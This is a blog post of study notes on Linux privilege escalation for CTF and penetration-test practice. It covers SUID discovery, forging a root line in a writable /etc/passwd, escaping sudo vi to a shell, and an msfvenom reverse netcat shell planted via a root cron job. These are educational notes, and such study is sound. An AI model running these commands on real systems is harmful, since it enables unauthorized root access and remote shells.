0xor1day

Common Linux Privesc

3 min read

Privilege Escalation -going from lower permission to a higher permission -exploit a design flaw or configuration Uses: -Reset passwords -Bypass access controls to compromise protected data -Edit software configs -Enable persistence -Change privilege of users

Direction of privilege Esc:

  1. Horizontal: expand reach over the compromised system, take over different user with the same privilege level -inherit files and access
  2. Vertical: attempt to gain higher privileges or access with an existing account -hijacking an account with admin or root privileges

Enumeration -LinEnum: simple bash script that performs commmon commands related to privilege escalation -how to get linEnum on target machine

  1. start python web server using “python3 -m http.server 8000”
  2. use wget on the target machine with local IP
  3. change the file executable using “chmod +x [file.sh]” -running LinEnum -run script -LinEnum output sections: read/write sensitive files: look at permission to look sensitive files SUID files: (set owner user ID up to execution) - special permission that runds with permissions of whoever owns it Crontab contents: schedule commands at a specific time

-Practical -shells cat /etc/shells -cron cat /etc/crontab -critical files cat /etc/passwd

Abusing SUID/GUID Files -SUID = run file with the permissions of the owner/group -privileges (rwx-rxw-rwx) user, group, others - read, write, execute’ -maximum number is 7 -extra bit 4: SUID (user) -extra bit 2: SGID (group) Finding SUID binaries find / -perm -u=s -type f 2>/dev/null find - initiates the find command / - searches the whole file system -perm - searches for files with specific permissions -u=s - any of the permission bits mode are set for the file, symbolic modes accepted -type f - only search for files 2>/dev/null - suppresses errors

Exploiting Writable /etc/passwd -/etc/passwd: stores user account information -plain text file -useful info: userId, groupId, home directory, shell and more -general read permission -root/superuser write access -fields are separated by a ’:’

  1. username
  2. password: x indicates encrypted passwords stored in /etc/shadow file
  3. user ID (UID): each user is assigned a user ID (1-99: pedefined accounts)(100- 999: reserved by system for admin and sys accounts/groups)
  4. Group ID (GID): primary group ID (stored in /etc/group/file)
  5. User ID info: add extra information about users - name, phone number etc
  6. Home directory: absolute path to the directory the user will be in when logged
  7. Command/shell: absoulte path of a command or shell (/bin/bash) Exploit: change pw hash, set UID, set GID, Shell to root etc

Practical openssl passwd -1 -salt [salt] [password] username:passwordhash:0:0:root:/root:/bin/bash

Escaping Vi Editor -sudo -l: list -sudo vi: open vi as root :!sh - open a shell

Exploiting Crontab -cron daemon: long-running process that executes commands at specific dates and times -schedule activities either as one-time evens or recurring tasks cat /etc/crontab

= id

m = minute h = hour dom = Day of month mon = month dow = Day of week user = what user the command will run as command = what command should be run Exploit: -look for root privileges -local machine netcat listener: msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R -target machine run: cat /etc/crontab -find file to target copy file to the correct directory with the same name

PATH -an environment variable in Linux and Unix-like OS -view path using = echo $PATH -Privesc: rewrite the PATH variable to a location - so the SUID binary calls the system shell to run an executable -run with same privileges as owner of the SUID file

Futher Learning: Below is a list of good checklists to apply to CTF or penetration test use cases.Although I encourage you to make your own using CherryTree or whatever notes application you prefer. https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html https://payatu.com/guide-linux-privilege-escalation

Graph View